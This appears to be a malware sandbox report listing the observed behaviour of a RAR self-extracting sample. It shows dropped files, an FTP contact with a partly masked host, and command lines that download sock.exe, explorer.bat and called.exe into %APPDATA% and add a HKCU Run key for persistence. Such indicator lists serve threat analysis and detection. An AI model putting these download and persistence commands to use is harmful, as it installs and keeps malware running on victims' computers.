Technical Information
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'ini' = '%APPDATA%\called.exe'
- %TEMP%\rarsfx0\colors.exe
- %TEMP%\rarsfx0\start.exe
- %TEMP%\29849pps.bat
- %TEMP%\29849pps.bat
- 'ft#.###roscu.unam.mx':21
- DNS ASK ft#.###roscu.unam.mx
- ClassName: 'EDIT' WindowName: ''
- '%TEMP%\rarsfx0\start.exe'
- '%TEMP%\rarsfx0\colors.exe' ftp://ft#.###roscu.unam.mx/posgrado/info/sock.exe -O %APPDATA%\sock.exe
- '%TEMP%\rarsfx0\colors.exe' ftp://ft#.###roscu.unam.mx/posgrado/info/explorer.bat -O %APPDATA%\explorer.bat
- '%TEMP%\rarsfx0\colors.exe' ftp://ft#.###roscu.unam.mx/posgrado/info/called.exe -O %APPDATA%\called.exe
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\29849PPS.bat" "%TEMP%\RarSFX0\start.exe" "' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\29849PPS.bat" "%TEMP%\RarSFX0\start.exe" "
- '%WINDIR%\syswow64\reg.exe' ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v ini /t REG_SZ /d "%APPDATA%\called.exe"